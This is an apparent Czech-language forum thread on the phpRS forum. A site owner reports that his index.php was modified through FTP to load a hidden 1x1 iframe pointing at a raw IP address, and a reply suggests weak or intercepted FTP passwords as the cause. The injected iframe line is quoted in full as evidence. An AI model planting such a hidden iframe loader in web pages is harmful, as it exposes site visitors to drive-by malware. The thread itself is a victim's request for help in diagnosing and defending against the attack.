V poslední době je toho nějak moc, napřed ten vejr, co si zakládá účet a teď tohle.

V souboru index.php se mi objevilo na počátku:

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://91.203.92.136/spl2/index.php"></iframe><!-- ~ -->

po načtení framu to spustilo jakejsi javascript - ten nevím, co dělal, protože jsem byl upozorněn na virus ...

Začal jsem v logách na serveru pátrat, co se tam dělo a zjistil jsem, že to bylo před dvěma dny a že napřed někdo/něco projelo soubor robot.txt a pak komentář k článku (žádný komentář tam ale není):

[http://www.zdikov.cz/comment.php?akce=view&cisloclanku=2007120011]

Pak už došo k načtení souboru index.php přes ftp, jeho změně a opětovnému uložení. nemůže být díra někde v komentářích? Stalo se Vám něco podobněho? Co ten script dělal? Jak se bránit?

Dík za rady. Kuba

Stalo se mi něco podobného, jen jsem vir neměl ve frame, ale přímo v indexu - na konci. Mnohokrát odentrovanej a odmezerníkovanej. S těma komentářema - nechápu, jak by to mohlo pomoci k přístupu na FTP. Spíš slabsí heslo. Nebo odchycené při FTP přenosu.

MM

[http://www.phprs.net/forum/read.php?32,31506,31701#msg-31701]